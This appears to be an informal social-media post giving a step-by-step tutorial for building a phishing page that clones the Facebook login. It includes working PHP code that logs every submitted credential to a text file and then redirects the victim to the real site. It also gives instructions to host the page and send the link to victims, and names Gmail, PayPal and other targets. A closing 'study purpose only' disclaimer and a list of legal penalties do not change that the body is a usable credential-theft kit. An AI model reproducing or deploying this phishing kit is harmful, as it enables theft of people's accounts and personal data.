Most of my friends, group mates asked me about hacking any social networking accounts..
So, by force i'm here to tell you all..
The easiest way to hack any account is Phishing.
Ok, let's get started!
1. First Open the website of which you want to make phisher/ fake login page.
Example: www.facebook.com
2. Now right click and select 'page source'.
3.
Copy the whole text and paste it in a notepad,
Now search for "action = " and change following address to login.php.
4. After editing save the page as "index.html"
5. Now its time to create login.php . Open notepad and copy/paste this below code and save it as login.php :
header ('Location: http://facebook.com/login.php');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
6. Now create a simple and empty text file in notepad and save it as log.txt
7. Now create your own free web hosting account in free hosting site and upload all the three files.
(You can use any FREE web hosting site)
8. Upload Index.html,
login.php,
log.txt,
we created in above steps...
9. We are done, our phisher / fake login page is ready.
How to Hack Accounts ?
Send the index.html
link to the victim,
once he/she will enter the information and do login with our fake login page then every thing will be stored in log.txt,
we can now open log.txt to see all the Login details
.
Its very simple to create phisher of any website in the world,
Here i have taken the example of Facebook Phisher.
But in this same you can also create the phisher of many websites like‪#‎Yahoo‬‪#‎Gmail‬‪#‎Orkut‬‪#‎Msn‬‪#‎Paypal‬‪#‎Paytm‬ etc.
**Note : This tutorial is for study purpose only. I want to make you aware how phishing is done. Please don't misuse this Knowledge.
Don't "Hack Accounts", its illegal.
I am not responsible for any hack done by you..**
Under the ‪#‎Computer_Misuse_ ACT you have committed Criminal offences.
"Gaining unauthorised_access‬" has a maximum penalty of Rs.139852.8 & Six(6) Months in ‪#‎prison‬ (in jail colonthree emoticon )
(That is simply logging in to someone else's account).
" Unauthorized modification of computer material"
(Ex: Changing files)
then has a penalty of up to Five years in prison.
Remember the police are having a crackdown on people doing dumb things on Facebook etc.

Page views